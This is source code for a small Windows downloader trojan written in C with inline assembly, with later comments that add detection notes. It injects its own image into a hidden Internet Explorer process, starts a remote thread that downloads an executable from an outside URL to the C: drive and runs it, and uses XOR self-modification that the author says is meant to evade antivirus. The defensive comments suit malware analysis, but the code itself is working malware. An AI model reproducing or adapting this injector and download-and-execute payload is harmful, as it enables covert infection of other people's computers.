无dll插入进程
/*
"mini_downloader"
code by kardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/opt:nowin98") //取消这4行的注释,可编译出2k大的文件
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/entry:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/base:0x13150000")
// File-scope state shared between the local process and the injected copy.
// The three function pointers are resolved at run time with getprocaddress
// instead of being imported, so the API names do not appear in the import
// table; the string literals passed to getprocaddress in download() and
// main() are the static indicators that survive this.
// Because the image is later written into the target at the same base
// address (see the /base linker option above), the absolute addresses of
// these globals are also valid inside the injected copy.
hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );// resolved at run time: ShellExecuteA from shell32.dll
dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);// resolved at run time: URLDownloadToFileA from urlmon.dll
handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); // resolved at run time: CreateRemoteThread from kernel32.dll; used in main() to start the remote thread
handle processhandle; // handle to the target process (the browser started in main())
dword pid;            // process id of that target, filled in by getwindowthreadprocessid
hinstance hshell,hurlmon,hkernel; // module handles for shell32, urlmon and kernel32
// Payload routine. It is never called locally: main() copies the whole image
// into the target process and starts a remote thread at this address, so
// everything below runs inside the browser process.
// Observable behaviour: fetch a remote executable to a fixed path on drive C:,
// launch it through ShellExecuteA, then call exitprocess, which terminates the
// host (the browser), not the original injector.
// Detection notes: URLDownloadToFileA immediately followed by ShellExecuteA
// inside a browser process, a hard-coded drop path on the system drive, and an
// exitprocess from a thread that was not created by the host are all strong
// behavioural indicators; the two API-name strings below are static ones.
void download() // download routine executed by the injected thread
{
hshell=loadlibrary("shell32.dll");
hurlmon=loadlibrary("urlmon.dll");
// Resolve the two APIs by name at run time (see the globals at file scope).
(farproc&)shellrun=getprocaddress(hshell,"shellexecutea");
(farproc&)downfile= getprocaddress(hurlmon,"urldownloadtofilea");
// Neither loadlibrary nor getprocaddress result is checked; a NULL pointer
// is called through here, which faults the host thread.
downfile(null,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, null);
shellrun(0,"open","c:\\ieinst12.exe",null,null,5); // 5 == SW_SHOW on Win32, i.e. the dropped file is started visibly
exitprocess(0); // terminates the host process the payload was injected into
};
// Injector. Not the program entry point (the linker entry is decrpt, below);
// decrpt() calls it after rewriting the bytes of download().
// Steps: start the browser hidden, locate its process, reserve RWX memory in
// it at this image's own base address, copy the entire image there, and start
// a remote thread at download(). No return value is checked anywhere in this
// function, so any failed step feeds garbage into the next one.
// Detection notes: a hidden winexec of the browser, openprocess with
// process_all_access on a browser, virtualallocex with page_execute_readwrite
// at a fixed non-system base, writeprocessmemory of a full PE image, and a
// dynamically resolved createremotethread form a classic injection chain
// that memory-scanning and API-sequence rules can match.
void main() // injector body
{
//1. Build the browser path from the Windows drive and start it hidden.
char iename[max_path],iepath[max_path];
zeromemory(iename,sizeof(iename));
zeromemory(iepath,sizeof(iepath));
getwindowsdirectory(iepath,max_path);
// Only the first three characters (the drive and root, e.g. "C:\") are kept;
// iename was zeroed above, so the copy stays NUL-terminated.
strncpy(iename,iepath,3);
strcat(iename,"program files\\internet explorer\\iexplore.exe"); // hard-coded install path
winexec(iename,sw_hide);
sleep(500); // fixed wait for the browser window to appear; nothing below verifies it did
//2. Locate the browser process by its top-level window class and open it.
hwnd htemp;
htemp=findwindow("ieframe",null);
getwindowthreadprocessid(htemp,&pid); // htemp may be NULL; pid is then whatever this leaves
processhandle=openprocess(process_all_access, false, pid);
//3. Reserve memory in the target.
hmodule module;
lpvoid newmodule;
dword size;
lpdword lpimagesize; // holds SizeOfImage, not a pointer, despite the type
module = getmodulehandle(null);// base address of this process's own image
// Read SizeOfImage from this image's PE headers:
// [base+0x3c] is IMAGE_DOS_HEADER.e_lfanew, and NT headers + 0x50 is
// IMAGE_OPTIONAL_HEADER32.SizeOfImage (0x18 header prefix + 0x38 field offset).
_asm
{
push eax;
push ebx;
mov ebx,module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
size=(dword)lpimagesize;
// Reserve at the same base address as this image so that absolute addresses
// (globals, download()) stay valid in the copy; RWX is requested directly.
newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); // same base as our own image
//4. Copy the whole image across and start a thread in it.
writeprocessmemory(processhandle, newmodule, module, size, null);// copy the entire in-memory image
lpthread_start_routine entrypoint;
// Take the address of download(); because the copy sits at the same base,
// the same address is valid in the target.
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
// createremotethread is resolved by name rather than imported.
hkernel=loadlibrary("kernel32.dll");
(farproc&)myinject= getprocaddress(hkernel,"createremotethread");
myinject(processhandle, null, 0, entrypoint, module, 0, null); // start the remote thread at download(); the thread parameter (module) is unused by it
//5. Release the process handle; the thread handle returned above is discarded.
closehandle(processhandle);
return;
} ;
// Program entry point (linker /entry:decrpt). Rewrites the bytes of download()
// in place: the region from download() up to decrpt() is copied into a local
// buffer, then for each key 1..0xff the saved bytes are XORed with the key,
// written back over download(), and main() is tried. The loop ends on the
// first main() that returns normally; an exception raised inside main() is
// swallowed by the catch-all handler and the next key is tried.
// Detection notes: a process that makes one of its own code pages writable
// (virtualprotectex with page_execute_readwrite on its own image), byte-loops
// over that page, and wraps the result in a catch-all SEH handler is
// self-modifying code; that behaviour, not the decoded bytes, is the
// reliable signal here.
// Layout dependence: the copy length is (decrpt - download) as laid out by the
// linker, but the local buffer is fixed at 500 bytes and nothing checks the
// region fits; the protection change also covers only 0x1000 bytes from
// download().
void decrpt()
{
handle myps;
dword oldattr;
byte shellcode[500]; // saved copy of the original bytes of download()
zeromemory(shellcode,sizeof(shellcode));
myps=getcurrentprocess();
// Make the page holding download() writable and executable.
::virtualprotectex(myps,&download,0x1000,page_execute_readwrite,&oldattr);
// First, save the original code bytes into the local buffer:
// esi = download, edi = shellcode, ecx = decrpt - download; copy ecx bytes.
_asm
{
pushad;
lea esi,download
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
en1:
lodsb;
stosb;
dec ecx;
jne en1;
popad;
};
// Decode and write back, one candidate key per iteration.
int i;
for (i=1;i<=0xff;i++)
{
// Re-read the untouched saved copy each time, XOR every byte with the low
// byte of i, and store it over download(); keys are therefore tried
// independently, not cumulatively.
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov ebx,i;
xor al,bl;
stosb;
dec ecx;
jne en2;
popad;
};
// Author's note: this construct exists to keep ordinary antivirus software
// from recognising the file as a virus. (From the defender's side the
// construct itself is the indicator; see the header comment.)
// Nothing validates the decoded bytes before main() injects them; the only
// feedback is whether main() raises an exception.
__try
{
main();
return;
}
__except(exception_execute_handler)
{
};
}
return;
};